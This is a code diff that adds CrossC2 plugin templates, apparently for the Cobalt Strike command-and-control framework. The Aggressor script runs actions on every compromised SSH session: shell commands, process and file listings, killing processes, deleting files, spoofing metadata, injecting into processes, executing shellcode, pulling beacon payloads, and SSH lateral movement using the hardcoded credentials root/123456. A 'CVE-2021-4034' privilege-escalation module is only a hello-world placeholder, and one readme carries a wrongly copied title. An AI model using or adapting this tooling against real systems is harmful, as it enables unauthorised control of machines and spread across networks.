Template with API & Source file

third-party/api_demo/load.cna

@@ -0,0 +1,86 @@
+
+println("---------- third party ----------------");
+
+sub callback_ls{
+    # $1 = beacon ID, $2 = the folder, $3 = results
+    $bid = $1;
+    $pwd = $2;
+    $res = $3;
+
+    blog($bid, @($pwd, $res));
+}
+
+sub callback_ps {
+    $bid = $1;
+    $res = $2;
+
+    blog($bid, @($res));
+}
+
+foreach $beacon (beacons()) {
+    if (!-isactive $beacon['id']) {
+    } else if (-isssh $beacon['id']) {
+        $bid = $beacon['id'];
+        blog($bid, "auto api test demo");  # 记录日志
+
+        bshell($bid, "echo \$AAA");  # 命令执行
+        bcc2_setenv($bid, "AAA", "ccc");  # 设置环境变量
+        bshell($bid, "echo \$AAA");
+
+        bcc2_unsetenv($bid, "AAA");     # 删除环境变量
+        bshell($bid, "echo \$AAA");
+
+        bsleep($bid, 2);    # 设置休眠时间
+
+        btask($bid, "list dir");  # 记录执行任务
+        bls($bid, "./", &callback_ls);  # 获取执行目录下的文件列表信息, 支持回调
+
+        btask($bid, "list process");
+        bps($bid, &callback_ps);  # 获取进程信息, 支持回调
+
+        bpwd($bid); # <---------- teamserver ignore
+        bmkdir($bid, "/tmp/1234");      # 创建目录
+        bcd($bid, "/tmp/1234");     # 切换工作目录
+        bpwd($bid);             # 获取工作目录
+
+        bkill($bid, 123);       # 结束指定PID进程
+        brm($bid, "/tmp/1234/aaa");    # 删除文件 / 文件夹
+        # brm($bid, "/tmp/1234/bbb");
+
+        bsetostype($bid, "printer");    # 修改 beacon 元数据中的操作系统类型
+        bsetlocalip($bid, "10.0.0.1");      # 修改 beacon 元数据中的内网IP
+        bsethostname($bid, "test_hostname");    # 修改 beacon 元数据中的主机名称
+
+    #  bcc2_inject($bid, $pid, $fileData, $temp_file_workpath);
+        # bshell($bid, "echo 0 > /proc/sys/kernel/yama/ptrace_scope");
+        bcc2_inject($bid, 1234, "aaaa", "/tmp/1234/");      # 向指定PID进程注入指定内容
+
+    # bssh_jump($bid, $username, $password, $privatekey, $passtype, $listener, $targetArray, $workspace);
+        bssh_jump($bid, "root", "123456", "", "ssh", "test_demo_cc2_listener", @("10.0.1.3", "10.0.1.4"), "/tmp/1234/");  # 向目标主机列表通过 SSH 协议，上线指定listener的beacon
+
+        $res = getSSHSession();     # 获取活跃状态的 CrossC2 会话
+        blog($bid, $res);
+
+        $res = getCrossC2Site();       # 获取服务端 CrossC2 beacon的下载地址
+        blog($bid, $res);
+
+        $res = getCrossC2Listener();    # 获取服务端配置的 CrossC2 监听器信息
+        blog($bid, $res);
+
+        $libbeacon = getCrossC2Beacon("test_demo_cc2_listener", "lib");     # 从服务端指定 CrossC2 监听器中获取动态库类型 beacon
+        $beacon = getCrossC2Beacon("test_demo_cc2_listener", "main");     # 从服务端指定 CrossC2 监听器中获取可执行文件类型 beacon
+        $len_libbeacon = size($libbeacon);
+        $len_beacon = size($beacon);
+        blog($bid, "libbeacon size: $len_libbeacon");
+        blog($bid, "beacon size: $len_beacon");
+
+
+        bcc2_unsetenv($bid, "AAA")
+        bshell($bid, "export");
+
+
+        # run shellcode
+        bshellcode($bid, "\\x90\\x90\\x90\\x90");           # 指定会话中执行 shellcode
+
+    }
+}

third-party/lpe/CVE-2021-4034/load.cna

@@ -0,0 +1,3 @@
+println("cve-2021-4034/load.cna");
+println("use exp.linux");
+println("use exp.mac");

third-party/lpe/CVE-2021-4034/readme.md

@@ -0,0 +1,9 @@
+# CVE-2021-4034 polkit pkexec LPE 
+
+# this module support MacOS & Linux
+
+# 编译 ELF & MachO 可执行文件 demo
+
+cve-2021-4034 -> 
+    exp.linux
+    exp.mac

third-party/lpe/CVE-2021-4034/src/exp.c

@@ -0,0 +1,6 @@
+#include <stdio.h>
+
+int main(int argc, char **argv) {
+    printf("hello, this is CVE-2021-4034 demo.");
+    return 0;
+}

third-party/lpe/CVE-2021-4034/src/makefile

@@ -0,0 +1,38 @@
+TARGET_Linux = exp.linux
+TARGET_Mac = exp.mac
+TARGET_shared = false
+
+ifeq ($(OS),Windows_NT)
+    ARCH := Windows
+else
+    ARCH := $(shell uname -s)
+endif
+
+ifeq ($(ARCH), Linux)
+    target = $(TARGET_Linux)
+	readSymbol = strings $(target) | grep GLIBC
+endif
+ifeq ($(ARCH), Darwin)
+    target = $(TARGET_Mac)
+endif
+
+ifeq ($(TARGET_shared), true)
+	CC_CFLAGS = -shared
+else
+	CC_CFLAGS = 
+endif
+
+all: $(target)
+	@echo "----------------- nm ---------------------"
+	nm $(target)
+	@echo "------------------------------------------"
+	@echo "---------------- GLIBC -------------------"
+	$(readSymbol)
+	@echo "------------------------------------------"
+	cp $(target) ../
+
+$(target): exp.o
+	gcc $^ $(CC_CFLAGS) -o $@
+
+clean:
+	rm $(target) *.o

third-party/utils/library_demo/load.cna

@@ -0,0 +1,3 @@
+println("library_demo/load.cna");
+println("use libtest1.linux");
+println("use libtest1.mac");

third-party/utils/library_demo/readme.md

@@ -0,0 +1,10 @@
+# CVE-2021-4034 polkit pkexec LPE 
+
+# this module support MacOS & Linux
+
+# 编译 Linux & MacOS 动态库文件 demo
+
+
+demo_a.txt -> 
+    libtest1.linux
+    libtest1.mac

third-party/utils/library_demo/src/makefile

@@ -0,0 +1,38 @@
+TARGET_Linux = libtest1.linux
+TARGET_Mac = libtest1.mac
+TARGET_shared = true
+
+ifeq ($(OS),Windows_NT)
+    ARCH := Windows
+else
+    ARCH := $(shell uname -s)
+endif
+
+ifeq ($(ARCH), Linux)
+    target = $(TARGET_Linux)
+	readSymbol = strings $(target) | grep GLIBC
+endif
+ifeq ($(ARCH), Darwin)
+    target = $(TARGET_Mac)
+endif
+
+ifeq ($(TARGET_shared), true)
+	CC_CFLAGS = -shared
+else
+	CC_CFLAGS = 
+endif
+
+all: $(target)
+	@echo "----------------- nm ---------------------"
+	nm $(target)
+	@echo "------------------------------------------"
+	@echo "---------------- GLIBC -------------------"
+	$(readSymbol)
+	@echo "------------------------------------------"
+	cp $(target) ../
+
+$(target): test1.o
+	gcc $^ $(CC_CFLAGS) -o $@
+
+clean:
+	rm $(target) *.o

third-party/utils/library_demo/src/test1.c

@@ -0,0 +1,5 @@
+#include <stdio.h>
+
+void func1(int argc, char **argv) {
+    printf("hello, this is library demo\n");
+}